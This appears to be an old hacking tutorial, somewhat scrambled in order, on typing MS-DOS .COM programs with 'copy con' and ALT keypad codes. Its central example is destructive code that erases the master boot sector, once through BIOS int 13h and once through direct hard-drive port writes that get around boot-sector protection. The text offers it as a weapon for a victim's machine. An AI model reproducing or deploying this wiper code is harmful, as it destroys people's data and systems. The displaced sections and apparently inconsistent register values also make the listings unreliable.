What are 'extreme conditions'? You are sitting in front of a computer with
only MS-DOS installed: no compilers, hex editors, shells or debuggers, and you
need to recover lost data, remove a virus, or write a new one. These are
extreme conditions. Most programmers won't be able to do anything, and most
administrators think that such a computer is 100% secure.
I have chosen pure MS-DOS as the operating system to program for, because
some versions of Windows include many things that make this task easier
(e.g. Windows 98 has a built-in browser with VBScript and JavaScript
interpreters, so you can easily write a hex editor and more).
This article will be interesting both for beginners and for experienced
hackers. I also recommend it to programmers, administrators, and anybody
who wants to feel the hacking spirit, which is now disappearing together with
the previous generation of hackers.
THE BEGINNING
To read and understand this you will need at least the following:
knowledge of assembler and experience working with MS-DOS. You will also
need a list of x86 instruction opcodes (you can find one here on Elf Qrin
Hacking Labs), an ASCII table, and a lot of free time.
First of all, we need some kind of text editor. But the administrator
removed EVERYTHING that could help us. There is only one thing that
distinguishes a good hacker from any other hacker: deep knowledge of
everything he works with. If he works with DOS, he knows everything about
it. There is an undocumented function that opens a tiny text editor, but
that's enough. Enter this DOS command:
C:\>copy con test.com
This starts the text editor. This is our instrument. But we still don't
know how to write binaries with it.
If you look in the official MS-DOS manual, you'll find the answer: using
the ALT key and the numeric keypad you can enter arbitrary byte values, and
therefore create binaries.
First of all, check that NumLock is on. Now hold ALT, type 195 on the
numeric keypad, then release ALT. To save the file and exit, press CTRL-Z and
hit Enter. Now run it.
It doesn't do anything, but it doesn't hang the system either. If you
disassemble it you will find that test.com consists of only one
instruction, RETN. As you have already guessed, the opcode of RETN is 0xC3,
which is 195 in decimal.
ADVANCED
Well, that was easy. Now try to enter this:
ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT-32 Hi,world!$
Then press CTRL-Z and hit Enter. Clearly this is a program that prints
"Hi,world!". Let's disassemble it:
I hope you know about the reversed byte order in a machine word (little
endian: ALT-09 ALT-01 = 0109h). Also, to show the beauty of this method, I
used the symbol '!' (0x21) to call interrupt 0x21, so knowing ASCII codes can
make your life easier. But why do we need the symbol 20h (ALT-32, a space) at
49E0:0108?
This is the main problem of this method. Using ALT and the numeric
keypad we cannot enter some byte values. Here is the list of them:
You will need to avoid these bytes. If you look at the code, you'll see
that the real offset of the string is 0x108, and the byte 08 cannot be
entered. After adding one padding byte the offset becomes 0x109. Actually
there is a more elegant way to do it:
One of the main problems is finding the offsets of variables and
labels. You can write the program on paper, giving the variables symbolic
names; once the program is ready it will be easy to find the necessary
offsets and addresses.
Another possibility is to declare all variables before their use:
jmp short $+20 reserves 20 bytes for the string. This method can also be
used for labels.
THE EXAMPLE
I think you are tired of theory and feel ready to see this method at
work? As an illustration we will try to create a program that erases the
boot sector. Attention! Using this program to destroy information is a crime.
You should use it only for experimental purposes.
First of all, let's write it in assembler:
As you see, among the bytes we have one #0, one #3 and one #19. Let's
modify the program to avoid them:
This is quite a hard example. Assembler programming and interrupts are
not really the subject of this article; I can only refer you to other
references that you can easily find on the Internet.
That's all: enter this on the victim's machine and you have a powerful
weapon. I recommend using it very carefully.
Fortunately (or unfortunately, depending on the reader's orientation),
the BIOS has a boot sector write protection (sometimes called "Virus
warning"). It will block any attempt to modify the master boot sector.
What's more, special protection software may be installed. For example,
running this program under Windows 98 will have no effect. But we can still
work with the hard drive I/O ports at a low level.
Here is an example of a program that will erase the master boot sector
through the hard drive I/O ports:
I don't know any popular protection that can track and block that
program. However, this does not apply to Windows NT: that OS won't allow a
program without the necessary privileges to work with the ports; even more,
it will close the application's window!
Preparing this example for entry with ALT and optimizing its size I will
leave as an exercise to the reader.
ENDING
It's not easy. All this requires a lot of experience and talent, but it
gives you incredible power over the machine. I hope you won't be using this
power for destruction, and I hope this article will be a step "back to the
real spirit of hacking".
Programming in extreme conditions
by Alexey Kalmykov (aka B52)
INTRODUCTION
But this won't stop the real hacker ...
(con stands for "console")
49E0:0100                       start:
49E0:0100 B4 09                 mov  ah,9
49E0:0102 BA 0109               mov  dx,offset data_1   ; (49E0:0109='Hi,world!$')
49E0:0105 CD 21                 int  21h                ; DOS Services ah=function 09h
                                                        ; display char string at ds:dx
49E0:0107 C3                    retn
49E0:0108 20                    db   20h
49E0:0109 48 69 2C 77 6F 72 6C 64 21 24
                                data_1 db 'Hi,world!$'  ; xref 49E0:0102
0, 3, 6, 8, 16 (0x10), 19 (0x13), 27 (0x1B), 255 (0xFF)
mov dx,10Ah   ; 0A 01: both bytes can be entered; dec dx itself takes one byte, so the string now starts at 109h
dec dx        ; 4Ah, dx = 109h
These two variants are the same size (dec dx is 1 byte, just like the
padding byte), so choose whichever suits you best.
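As an added example (not part of the original article), here is a small Python check for the two problems just discussed: which bytes of a .COM image fall in the unenterable list, and whether the value loaded into DX still points at the string after each fix. The byte list and the "Hi,world!" program are the article's; the function names are mine.

```python
import struct

# Byte values the article lists as impossible to enter with ALT + numeric keypad.
UNTYPABLE = {0, 3, 6, 8, 16, 19, 27, 255}
COM_BASE = 0x100                 # a .COM image is loaded at offset 0100h
STRING = b"Hi,world!$"           # the article's string, '$'-terminated for int 21h/ah=9

def untypable_offsets(image: bytes) -> list:
    """Load addresses of every byte that cannot be typed at all."""
    return [COM_BASE + i for i, b in enumerate(image) if b in UNTYPABLE]

def keystrokes(image: bytes) -> list:
    """One keystroke per byte: printable ASCII is typed directly (the article's
    '!' for 21h), everything else as ALT-<decimal> on the numeric keypad."""
    plan = []
    for b in image:
        if b in UNTYPABLE:
            raise ValueError(f"byte {b:#04x} cannot be entered with ALT codes")
        plan.append(chr(b) if 0x21 <= b <= 0x7E else f"ALT-{b:02d}")
    return plan

def string_offset(image: bytes) -> int:
    """Where the '$'-terminated string actually lands once the image is loaded."""
    return COM_BASE + image.index(STRING)

def dx_loaded(image: bytes) -> int:
    """DX when int 21h runs: the imm16 of 'mov dx,imm16' (BAh), minus one if a
    'dec dx' (4Ah) follows. struct '<H' is the little-endian order the article
    points out (09 01 = 0109h)."""
    i = image.index(b"\xBA")
    (dx,) = struct.unpack("<H", image[i + 1:i + 3])
    return dx - 1 if image[i + 3] == 0x4A else dx

def mov_dx(value: int) -> bytes:
    return b"\xBA" + struct.pack("<H", value)

def naive() -> bytes:
    # mov ah,9 / mov dx,0108h / int 21h / retn / string at 0108h -> contains byte 08h
    return b"\xB4\x09" + mov_dx(0x108) + b"\xCD\x21\xC3" + STRING

def padded() -> bytes:
    # the article's first fix: a padding byte (20h) after retn moves the string to 0109h
    return b"\xB4\x09" + mov_dx(0x109) + b"\xCD\x21\xC3\x20" + STRING

def decremented() -> bytes:
    # the article's "more elegant" fix: dec dx (4Ah, typed as the letter J) before int 21h;
    # the extra instruction also moves the string to 0109h, so the immediate is 010Ah
    return b"\xB4\x09" + mov_dx(0x10A) + b"\x4A\xCD\x21\xC3" + STRING
```

Running keystrokes() on naive() raises, while on padded() it reproduces the article's ALT sequence exactly.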
mov ah,9
jmp short $+20          ; skip the 18 data bytes that follow
db 'Hi,world!$'
db 8 dup (20h)          ; fill the rest of the reserved space so the jump lands on the next instruction
mov dx,100h+2+2         ; 100h = base address, 2 = length of mov ah,9, 2 = length of jmp
int 21h
retn
B8 01 03   mov ax,0301h
B9 01 00   mov cx,0001h
BA 80 00   mov dx,0080h
CD 13      int 13h
C3         retn
xor ax,ax
mov ds,ax
mov ax,0299h
inc ax
inc ax
xor cx,cx
inc cx
mov dl,80h
mov bx,13h*4
pushf
cli
push cs
call dword ptr [bx]
retn
mov dx,1F2h
mov al,1
out dx,al
inc dx
out dx,al
inc dx
xor ax,ax
out dx,al
inc dx
out dx,al
mov al,10100000b
inc dx
out dx,al
inc dx
mov al,30h
out dx,al
lea si,Buffer
mov dx,1F0h
mov cx,513
rep outsw